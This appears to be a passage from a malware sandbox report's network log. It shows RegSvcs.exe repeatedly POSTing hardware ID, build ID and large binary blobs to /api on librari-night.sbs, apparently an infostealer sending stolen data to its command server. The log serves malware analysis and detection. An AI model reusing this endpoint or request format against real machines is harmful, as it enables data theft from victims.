2024-11-22 04:02:11 UTC	186	IN	Data Raw: 75 55 64 76 58 39 73 62 46 72 72 73 55 6e 66 71 6c 51 36 79 66 71 41 38 76 6d 53 66 53 46 65 55 63 71 47 64 59 79 57 6e 69 53 32 34 78 53 78 64 32 35 6a 57 61 48 32 41 74 53 35 45 47 36 41 30 4b 48 47 76 72 5a 47 5a 55 30 56 31 63 56 78 6a 39 6e 4a 62 50 71 75 57 4c 35 67 4b 44 49 56 6a 75 67 43 31 72 52 55 66 63 66 4d 35 38 43 33 38 78 38 68 54 52 62 56 77 48 65 4d 31 38 42 73 76 2b 67 63 75 48 35 75 61 56 71 76 2b 67 6a 58 74 68 68 73 67 39 53 6d 79 37 43 38 54 47 51 42 55 5a 50 42 61 73 43 4f 68 6c 57 35 39 67 2b 70 64 43 68 31 47 37 4b 2f 44 0d 0a Data Ascii: uUdvX9sbFrrsUnfqlQ6yfqA8vmSfSFeUcqGdYyWniS24xSxd25jWaH2AtS5EG6A0KHGvrZGZU0V1cVxj9nJbPquWL5gKDIVjugC1rRUfcfM58C38x8hTRbVwHeM18Bsv+gcuH5uaVqv+gjXthhsg9Smy7C8TGQBUZPBasCOhlW59g+pdCh1G7K/D
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 33 37 61 37 0d 0a 74 54 79 54 43 4b 49 78 36 33 4e 74 62 5a 49 5a 45 49 51 31 4d 74 30 6a 4e 7a 50 62 4c 7a 76 45 61 74 37 5a 47 52 53 70 66 4d 48 31 62 67 58 62 38 6d 62 35 38 43 6a 38 78 38 68 62 52 6a 65 36 48 6d 4d 30 59 5a 37 39 50 6c 59 76 6e 51 6f 4d 68 57 6e 39 51 58 52 73 68 31 6e 67 64 36 75 77 72 71 34 51 6d 4a 48 45 74 7a 50 59 49 72 56 79 47 65 32 37 42 36 34 65 33 70 69 58 4f 75 78 53 64 2b 71 56 44 72 4a 39 4b 6e 4b 72 37 52 58 49 56 35 52 79 6f 5a 31 6a 4a 61 65 4a 4c 6e 68 46 37 70 35 5a 57 78 63 6f 2f 38 50 33 62 30 5a 62 49 37 53 70 38 71 31 76 45 46 70 54 42 50 59 79 48 75 47 31 73 64 75 2b 71 35 59 76 6d 41 6f 4d 68 57 62 2f 41 6e 59 71 56 52 39 78 38 7a 6e 77 4c 66 7a 48 79 46 54 46 64 72 47 63 59 2f 52 77 6d 2b 32 35 52 32 32 65 32 Data Ascii: 37a7tTyTCKIx63NtbZIZEIQ1Mt0jNzPbLzvEat7ZGRSpfMH1bgXb8mb58Cj8x8hbRje6HmM0YZ79PlYvnQoMhWn9QXRsh1ngd6uwrq4QmJHEtzPYIrVyGe27B64e3piXOuxSd+qVDrJ9KnKr7RXIV5RyoZ1jJaeJLnhF7p5ZWxco/8P3b0ZbI7Sp8q1vEFpTBPYyHuG1sdu+q5YvmAoMhWb/AnYqVR9x8znwLfzHyFTFdrGcY/Rwm+25R22e2
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 35 6b 6e 66 76 6c 51 36 79 64 53 72 79 4c 69 38 52 47 4a 41 46 63 48 55 66 6f 6e 65 77 32 69 78 37 68 36 72 66 6d 64 6a 56 71 6a 32 44 74 43 2b 48 6d 47 4f 6c 65 6d 48 76 4b 73 48 4f 51 45 38 78 4e 5a 2f 77 4d 6d 49 66 66 72 6e 46 50 6b 67 4b 47 4a 59 6f 2f 55 4e 33 37 38 54 5a 49 44 48 72 73 4b 31 73 30 4e 71 54 68 6e 58 78 58 4b 53 30 4d 4a 73 75 65 30 56 74 33 74 73 4b 68 76 72 2b 42 47 59 36 6c 52 51 68 4e 75 38 79 4c 79 69 54 53 46 65 55 63 71 47 64 59 79 57 6e 69 53 2b 37 67 71 79 65 57 4e 68 57 36 7a 77 44 4e 4b 79 47 32 61 4b 32 36 7a 47 75 4c 74 4b 62 45 38 56 32 73 39 31 6a 4e 4c 42 4a 50 53 67 48 36 45 34 4d 43 70 2b 69 74 49 6c 33 36 68 55 66 63 66 4d 35 38 43 33 38 78 38 68 54 52 62 66 7a 48 6d 48 33 4d 68 74 74 4f 73 4b 71 33 74 73 61 56 79 Data Ascii: 5knfvlQ6ydSryLi8RGJAFcHUfonew2ix7h6rfmdjVqj2DtC+HmGOlemHvKsHOQE8xNZ/wMmIffrnFPkgKGJYo/UN378TZIDHrsK1s0NqThnXxXKS0MJsue0Vt3tsKhvr+BGY6lRQhNu8yLyiTSFeUcqGdYyWniS+7gqyeWNhW6zwDNKyG2aK26zGuLtKbE8V2s91jNLBJPSgH6E4MCp+itIl36hUfcfM58C38x8hTRbfzHmH3MhttOsKq3tsaVy
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 62 51 58 5a 73 6d 62 35 38 43 6a 38 78 38 68 62 42 50 55 37 33 57 62 6c 74 6b 71 6f 36 41 66 74 54 67 77 4b 6c 53 67 39 51 62 56 73 52 4a 68 67 74 43 74 78 72 79 37 53 6e 4e 43 45 4e 7a 43 63 6f 2f 51 77 47 57 31 35 68 2b 77 65 57 42 74 46 65 57 2f 44 73 44 79 54 43 4b 6e 30 71 54 44 2b 36 77 4a 65 41 45 59 33 34 59 71 77 4e 62 4d 62 72 44 75 47 4c 35 71 62 6d 4e 56 71 4f 30 4b 33 72 6f 53 62 6f 58 59 72 38 36 37 74 6b 78 73 53 68 4c 56 78 6e 6d 42 6c 6f 67 6b 76 66 68 59 34 54 68 5a 5a 31 75 76 38 51 72 49 74 56 52 39 78 38 7a 6e 77 4c 66 7a 48 79 46 4f 46 73 48 42 64 34 6a 66 78 6d 71 7a 36 52 2b 39 65 32 6c 75 57 61 54 32 43 74 43 7a 48 47 32 4b 31 61 7a 50 73 62 4a 4a 5a 41 46 52 6b 38 46 71 77 49 36 47 53 37 6e 6c 45 37 67 36 54 32 78 53 70 37 38 57 Data Ascii: bQXZsmb58Cj8x8hbBPU73Wbltkqo6AftTgwKlSg9QbVsRJhgtCtxry7SnNCENzCco/QwGW15h+weWBtFeW/DsDyTCKn0qTD+6wJeAEY34YqwNbMbrDuGL5qbmNVqO0K3roSboXYr867tkxsShLVxnmBlogkvfhY4ThZZ1uv8QrItVR9x8znwLfzHyFOFsHBd4jfxmqz6R+9e2luWaT2CtCzHG2K1azPsbJJZAFRk8FqwI6GS7nlE7g6T2xSp78W
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 4b 38 31 71 6e 4a 76 4b 56 57 4c 47 59 46 33 73 42 6c 6b 5a 61 49 4a 4c 79 67 51 4f 6b 32 4b 47 35 45 36 36 64 5a 69 75 6c 42 4d 64 36 46 39 64 6a 31 71 67 64 33 41 55 65 42 69 44 4b 53 6c 70 34 6b 2f 65 4d 4b 71 33 35 72 66 46 62 73 77 54 66 32 74 52 4a 6e 6a 73 58 6c 36 62 43 6e 51 43 45 50 58 39 79 47 4b 72 6d 57 6a 69 53 46 72 6c 69 68 4f 44 41 71 59 4b 6a 78 42 39 2b 6b 42 53 2b 6e 30 71 48 43 76 4b 4d 46 54 30 6f 4c 31 49 59 38 77 4e 43 47 50 4f 71 75 57 4c 31 70 4b 44 49 46 2b 61 52 63 69 2b 56 45 4d 4a 61 62 76 6f 65 74 38 78 38 7a 44 31 2f 42 68 69 72 41 6b 63 56 32 71 4f 59 62 72 33 73 76 56 47 75 6f 36 51 54 58 75 52 56 63 74 2f 75 71 78 72 69 39 42 56 42 58 45 73 50 46 64 34 66 6f 2b 47 71 39 39 42 2b 33 66 6d 67 71 47 2b 76 77 53 59 43 4c 56 Data Ascii: K81qnJvKVWLGYF3sBlkZaIJLygQOk2KG5E66dZiulBMd6F9dj1qgd3AUeBiDKSlp4k/eMKq35rfFbswTf2tRJnjsXl6bCnQCEPX9yGKrmWjiSFrlihODAqYKjxB9+kBS+n0qHCvKMFT0oL1IY8wNCGPOquWL1pKDIF+aRci+VEMJabvoet8x8zD1/BhirAkcV2qOYbr3svVGuo6QTXuRVct/uqxri9BVBXEsPFd4fo+Gq99B+3fmgqG+vwSYCLV
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 6e 6e 2b 76 68 48 44 51 53 53 49 4f 55 62 63 37 50 68 6e 4c 36 75 45 72 33 4f 48 6f 71 44 65 75 34 43 73 71 67 45 6d 47 66 31 75 44 35 68 5a 52 4a 5a 6b 41 4a 77 38 74 2b 6f 64 58 58 62 6f 54 65 44 62 70 32 5a 6d 31 44 75 72 39 48 6d 4c 31 55 4f 72 43 56 37 34 65 45 2f 51 64 35 41 55 65 54 38 33 47 4f 32 4d 46 79 71 36 30 2f 74 33 39 70 66 45 57 6d 38 79 6a 62 6f 78 34 69 78 35 57 68 68 2b 50 68 43 53 46 46 44 70 4f 65 49 74 4b 4e 6b 7a 66 74 73 45 71 6d 4e 6e 45 71 51 2b 75 6e 57 35 62 79 42 69 4c 52 6c 65 44 45 71 61 46 42 59 6c 63 63 6c 50 68 4d 70 63 48 46 64 4c 7a 6a 4a 6f 64 54 5a 47 78 53 73 66 67 50 2f 70 4a 55 4c 4d 6e 61 35 35 2b 43 38 77 38 68 66 6c 47 54 33 6a 4c 59 6c 76 4e 6e 74 4f 34 66 72 32 6b 6c 54 30 4b 6f 37 77 2f 62 38 6c 6f 69 6a 35 Data Ascii: nn+vhHDQSSIOUbc7PhnL6uEr3OHoqDeu4CsqgEmGf1uD5hZRJZkAJw8t+odXXboTeDbp2Zm1Dur9HmL1UOrCV74eE/Qd5AUeT83GO2MFyq60/t39pfEWm8yjbox4ix5Whh+PhCSFFDpOeItKNkzftsEqmNnEqQ+unW5byBiLRleDEqaFBYlcclPhMpcHFdLzjJodTZGxSsfgP/pJULMna55+C8w8hflGT3jLYlvNntO4fr2klT0Ko7w/b8loij5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:12 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V31ZB5AUZ1ZALSPCTT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12834 Host: librari-night.sbs
2024-11-22 04:02:12 UTC	12834	OUT	Data Raw: 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d Data Ascii: --V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="pid"2--V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="lid"Fc9Bn8--test
2024-11-22 04:02:13 UTC	1026	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=och8avr7qsngqp7arh0ef0bob5; expires=Mon, 17-Mar-2025 21:48:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KI7WxBDqehBtmxshsFu9X%2BQSDk4U%2FeO7VXyXSH%2BEgp%2B%2BXbWF4VSQ6nrwsXGnwFg51911eZvX%2Fy60CGzgzbgcywEhMzA8GLDLT%2FGkGuvaJAtCW8Brjx7Jdek3rfsNJ8ucfpHXQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605cd3bdc4289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13775&delivery_rate=1680092&cwnd=145&unsent_bytes=0&cid=59c37ff9432d23df&ts=801&x=0"
2024-11-22 04:02:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 04:02:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:14 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=POBUP2MJIL1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: librari-night.sbs
2024-11-22 04:02:14 UTC	15034	OUT	Data Raw: 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 Data Ascii: --POBUP2MJIL1Content-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--POBUP2MJIL1Content-Disposition: form-data; name="pid"2--POBUP2MJIL1Content-Disposition: form-data; name="lid"Fc9Bn8--test--POBUP2MJIL1Conte
2024-11-22 04:02:15 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p26fn8ku5o8ilg6j93t9ajgl1l; expires=Mon, 17-Mar-2025 21:48:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AL2kc3LC55Cu7wPsMMG%2FX2BOJBgObauSIUkYF0vzEkY1ivbVgsB%2FYUps6GcqD4CJZ73tNuJIcRzuSdhE8zAVZ2eG0Prhiou969Qq4vQDETIaCLnDurFBbZBFsEW96j4d7gxsWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605db0e8c8cec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10064&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15968&delivery_rate=181355&cwnd=199&unsent_bytes=0&cid=6d8c1331fedfacd5&ts=821&x=0"
2024-11-22 04:02:15 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 04:02:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:16 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U4WC6T04TDNKP3M5UHA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20572 Host: librari-night.sbs
2024-11-22 04:02:16 UTC	15331	OUT	Data Raw: 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 Data Ascii: --U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="pid"3--U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="lid"Fc9Bn8--te
2024-11-22 04:02:16 UTC	5241	OUT	Data Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
2024-11-22 04:02:17 UTC	1027	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kp9au68uvipcjfh9g1gsg747og; expires=Mon, 17-Mar-2025 21:48:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JL7my5u7wAes5kdFJ7DqVl7wgv%2FBFl%2FiqzCa4fDt8p1KHjPs4eCsi8y25U6o7%2Bw5%2Fir9tzvGi%2FYgRPaM%2BIu2Eyi6bX7FqjQ4xcWb8TAxFv%2BNeIYHBleXoSVkN1FwmMHySz9ZRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605e84ccd8c35-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1916&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21536&delivery_rate=1499743&cwnd=242&unsent_bytes=0&cid=bee38ee4d54c4081&ts=872&x=0"
2024-11-22 04:02:17 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 04:02:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:19 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AN34G8DXPIQAP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1233 Host: librari-night.sbs
2024-11-22 04:02:19 UTC	1233	OUT	Data Raw: 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d 41 4e 33 34 47 38 44 58 50 49 51 41 Data Ascii: --AN34G8DXPIQAPContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--AN34G8DXPIQAPContent-Disposition: form-data; name="pid"1--AN34G8DXPIQAPContent-Disposition: form-data; name="lid"Fc9Bn8--test--AN34G8DXPIQA
2024-11-22 04:02:19 UTC	1020	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5bogpsl4eqb4ljajkrv7d5s1ms; expires=Mon, 17-Mar-2025 21:48:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qGP1m3OO6ikcE8HWevZTkQ8Mo6uhQ8emN%2FpTXhgG%2FNE8R4bTjrs6VXHpaFxFNw509l9%2BEnhISsatMQne%2FI7UWGfbzO%2F54S4BbCVO2gEZlrGwGPP7RfIR8OY1FP1pdJzP7YeeA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605f6a9d24366-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2146&delivery_rate=1772920&cwnd=234&unsent_bytes=0&cid=130dda963c70e24d&ts=740&x=0"
2024-11-22 04:02:19 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 04:02:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49723	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:21 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XOQV0YRX0LEO9RK9T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551350 Host: librari-night.sbs
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4f 51 56 30 59 52 58 30 4c 45 4f 39 52 4b 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d Data Ascii: --XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="pid"1--XOQV0YRX0LEO9RK9TContent-Disposition: form-data; name="lid"Fc9Bn8--test--
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: b8 03 7b fa b1 65 c1 2c 31 ba 87 0e de f4 6d 0c af 99 a6 00 7c 7e cb 17 fc c9 72 67 bd 81 29 9b 5a cc d5 f5 07 e1 b3 52 fd 4d 52 2b ef a6 9a e5 c6 be 19 90 94 66 70 5f 0a 35 14 e1 2d a1 c5 0f bd 16 9a ff d4 f6 8f 61 ac 31 32 56 35 39 08 83 2c 9f 93 99 84 f4 40 48 72 6b 4e db 35 3e 51 74 bf a1 f1 03 e3 f7 21 93 51 64 e5 bb 0e b6 50 9e 01 42 5d e1 ab 51 cb 90 2f 31 3e 21 68 6e b5 70 d5 bd 04 9a 72 2e 78 62 f9 a7 3e f3 7a 43 d3 0c ba 06 9f eb 09 dd 51 ff 81 ef 8b 3d a6 54 8c 4b 0b 0f 28 b1 f7 10 14 08 96 c2 6f 5e 9d b4 4e 14 a0 2c 4d aa 7d 4f 0a 8b ba b0 15 1d 7c 22 72 3f dd eb 4f 99 b2 b6 36 17 54 e8 0a 8e 0c ae 28 32 fa 6e db 23 c1 71 24 f9 30 ce 3f 11 72 77 00 b5 e4 66 08 0e e2 8e 49 8c 52 fc d9 1b 4a 80 76 04 05 fb b8 85 bf f3 1b af 7c a2 09 4e 48 6c bd Data Ascii: {e,1m\|~rg)ZRMR+fp_5-a12V59,@HrkN5>Qt!QdPB]Q/1>!hnpr.xb>zCQ=TK(o^N,M}O\|"r?O6T(2n#q$0?rwfIRJv\|NHl
